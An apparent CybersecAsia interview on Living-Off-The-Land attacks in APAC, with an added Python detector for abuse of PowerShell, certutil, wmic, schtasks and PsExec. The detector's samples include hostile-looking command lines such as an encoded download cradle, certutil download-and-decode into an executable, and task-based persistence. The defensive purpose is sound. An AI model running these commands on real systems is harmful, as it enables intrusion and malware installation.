Imagine an intruder in your home threatening you with your own kitchen knives instead of bringing their own weapons. Stealthy and efficient!
Countries in the APAC region with burgeoning tech industries and rising internet penetration are particularly exposed to a cybercriminal tactic in which attackers abuse a network's own tools and resources to infiltrate systems.
People often think of malware as rogue software infiltrating networks: but what if the threat is already inside, hiding in plain sight? This is referred to as "Living Off The Land" (LOTL), a tactic that relies not on external code but on the legitimate tools and features already present in the target network to carry out malicious activity. Because nothing new is introduced, such attacks are incredibly stealthy and difficult to detect. The infamous SolarWinds attack is one example of LOTL tactics.
To find out more about LOTL trends, CybersecAsia spoke with Krishna Rajagopal, Group CEO, AKATI Sekurity, about the seriousness of the threat LOTL poses in the APAC region.
CybersecAsia: Can you use the SolarWinds attack to describe LOTL techniques and how it could be defended against?
Krishna Rajagopal (KR): In that incident, attackers inserted malicious code into a trusted software update for SolarWinds Orion, allowing them to evade detection. Using built-in system tools like PowerShell and WMI, which are trusted and often whitelisted by system admins, makes traditional detection methods less effective. Attackers were thus able to move laterally within networks, accessing sensitive data from US government agencies and major firms.
The impact was severe, with months of undetected espionage and millions in damages. Prevention could have involved measures like application ‘allowlisting’, behavioral analytics, Zero Trust architecture, and stronger supply chain security audits.
Traditional antivirus solutions and signature-based detection systems are not equipped to handle these kinds of threats. We need to shift our focus towards AI-based detection and advanced threat hunting techniques.
Imagine an intruder in your home using your own kitchen knives instead of bringing their own weapons. That is the essence of LOTL, and cyber defenders need to adapt their strategies. Deep defense is more crucial than ever. Incorporating layers of security, continuous monitoring, and regular penetration testing can keep cybersecurity teams ahead of such threats.
CybersecAsia: How do LOTL attackers leverage built-in system tools and administrative utilities to avoid detection?
KR: Attackers evade detection by blending in with normal network activity, using tools that are already trusted and whitelisted within a system. Specifically:
- Evading security tools: Since attackers use trusted and built-in utilities, traditional antivirus or endpoint detection systems may not flag their actions as suspicious.
- Reducing the need for malware: Instead of introducing new malware that is more ostentatious to security scanners, attackers can repurpose existing utilities to perform harmful actions like data exfiltration or lateral movement.
- Mimicking normal behavior: Many built-in utilities are routinely used by administrators for system maintenance. Attackers piggyback on these to disguise their actions.
Common trusted tools used by LOTL attackers include: PowerShell, Windows Management Instrumentation, Scheduled Tasks (Task Scheduler), PsExec, and CertUtil.
CybersecAsia: What are some effective strategies and best practices for organizations to detect and mitigate LOTL attacks?
KR: In the ever-evolving landscape of cybersecurity, traditional malware attacks are no longer the primary threat. Instead, attackers are increasingly leveraging LOTL techniques to carry out their malicious activities.
Here are some strategies and best practices that can help organizations stay one step ahead:
- Use a Security Operations Center to continuously watch for unusual activity
- Use Role-Based Access Control to ensure users have just enough permissions to do their job
- Enable logging for trusted system tools to detect any hidden or encoded commands used by attackers.
- Conduct Vulnerability Assessment and Penetration Testing regularly to identify and fix security weaknesses
- Use network segmentation to keep your critical assets separate from the rest of your network
- Implement application whitelisting to allow only approved programs to run
- Regularly update software and systems with the latest (and certified safe) security patches, but not on weekends
- Focus on behavioral analysis in threat hunting, so that a rich database of indicators of LOTL compromise can help teams detect unknown threats quicker
Also remember, it is not just about the tools we use, but how we use them.
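The logging recommendation above, together with the list of commonly abused utilities given earlier in the interview (PowerShell, WMI, Task Scheduler, PsExec, CertUtil), suggests a concrete check a SOC can run. The following is an added example written for this page; it is not code from the interview or from AKATI Sekurity. It assumes process-creation command lines are already being recorded (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1); the sample lines, the hostname and the IP addresses are constructed for the example, and the rule names are the example's own. The one piece of decoding it adds beyond simple string matching is recovering the clear text of a PowerShell -EncodedCommand payload, which is base64 over UTF-16LE.

```python
"""Flag Living-Off-The-Land patterns in process-creation command lines.

Added example for this page, not the interviewee's code. The sample
lines below are constructed, modelled on the CommandLine field of
Windows event 4688 / Sysmon event 1; they are not real captures.
"""
import base64
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Download-cradle markers that appear in clear text or in a decoded payload.
_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression", re.I)


@dataclass
class Finding:
    rule: str           # which LOTL pattern matched (names are this example's own)
    command_line: str   # the offending line, unchanged, for the analyst
    detail: str         # e.g. the decoded PowerShell script or the task action


def _tokens(cmd: str) -> List[str]:
    # posix=False keeps backslashes in Windows paths; quotes stay on the token,
    # so strip them before comparing.
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]


def _image(tok: str) -> str:
    # r"C:\Windows\System32\certutil.exe" -> "certutil"
    return tok.replace("/", "\\").rsplit("\\", 1)[-1].lower().removesuffix(".exe")


def _is_encoded_flag(tok: str) -> bool:
    # powershell.exe accepts any unique prefix of -EncodedCommand, plus -e and -ec.
    t = tok.lstrip("-/").lower()
    return t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))


def decode_powershell_payload(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script; None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyse(cmd: str) -> List[Finding]:
    """Return every LOTL finding for one command line (empty list if benign)."""
    toks = _tokens(cmd)
    if not toks:
        return []
    img, args = _image(toks[0]), toks[1:]
    lower = [a.lower() for a in args]
    found: List[Finding] = []

    if img in ("powershell", "pwsh"):
        clear: List[str] = []          # arguments that are not an encoded payload
        i = 0
        while i < len(args):
            if _is_encoded_flag(args[i]) and i + 1 < len(args):
                payload = decode_powershell_payload(args[i + 1])
                found.append(Finding("powershell_encoded_command", cmd,
                                     payload if payload is not None else "<payload is not base64/UTF-16LE>"))
                if payload and _CRADLE.search(payload):
                    found.append(Finding("powershell_download_cradle", cmd, "in decoded payload"))
                i += 2
                continue
            clear.append(args[i])
            i += 1
        if _CRADLE.search(" ".join(clear)):
            found.append(Finding("powershell_download_cradle", cmd, "in clear-text arguments"))
    elif img == "certutil":
        # -urlcache fetches a URL to disk; -decode/-encode turn base64 into a binary and back.
        if any(a in ("-urlcache", "-decode", "-encode") for a in lower):
            found.append(Finding("certutil_download_or_decode", cmd,
                                 " ".join(a for a in lower if a.startswith("-"))))
    elif img == "wmic" and {"process", "call", "create"} <= set(lower):
        found.append(Finding("wmic_process_create", cmd, " ".join(args[lower.index("create") + 1:])))
    elif img == "schtasks" and "/create" in lower:
        action = args[lower.index("/tr") + 1] if "/tr" in lower and lower.index("/tr") + 1 < len(args) else "?"
        found.append(Finding("schtasks_create", cmd, f"task runs {action}"))
    elif img.startswith("psexec"):
        found.append(Finding("psexec_remote_exec", cmd, "remote execution utility"))
    return found


def scan(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in analyse(line)]


# Constructed sample: the encoded script is built here so the base64 is exact.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.ps1')".encode("utf-16le")
).decode("ascii")

SAMPLE_COMMAND_LINES = [
    # routine admin activity that should not fire
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    r"certutil.exe -verify C:\certs\server.cer",
    r'schtasks.exe /query /tn "Backup"',
    # the same trusted tools used the LOTL way
    f"powershell.exe -NoP -W Hidden -enc {_ENC}",
    r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt",
    r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe",
    r'wmic.exe process call create "cmd.exe /c C:\Users\Public\a.exe"',
    r"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\a.exe",
    r"PsExec.exe \\fileserver01 -s cmd.exe",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"[{f.rule}] {f.detail}\n    {f.command_line}")
```

The rules deliberately key on arguments, not on the executable alone, because the same binaries are used legitimately every day: the first three sample lines produce no findings. Where PowerShell Script Block Logging (event 4104) is enabled, the decoded script is logged directly and the base64 step becomes a cross-check rather than the only source.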
CybersecAsia: What is the prevalence of LOTL tactics in attacks that your firm has encountered in APAC?
KR: LOTL attacks have been at an all-time high, possibly due to:
- Increase in digital-first approaches: This includes organizations integrating advanced technologies such as AI, IoT, and cloud computing into their daily operations.
- Increased cloud adoption: With more businesses shifting to the cloud and hybrid-work environments, attackers in APAC are exploiting these trends by utilizing cloud services for their attacks, often with a LOTL approach.
- Integration with global supply chains: APAC is home to many multinational corporations and critical supply chain hubs, making it a prime target for LOTL attacks.
CybersecAsia thanks Krishna Rajagopal for sharing his professional insights with readers.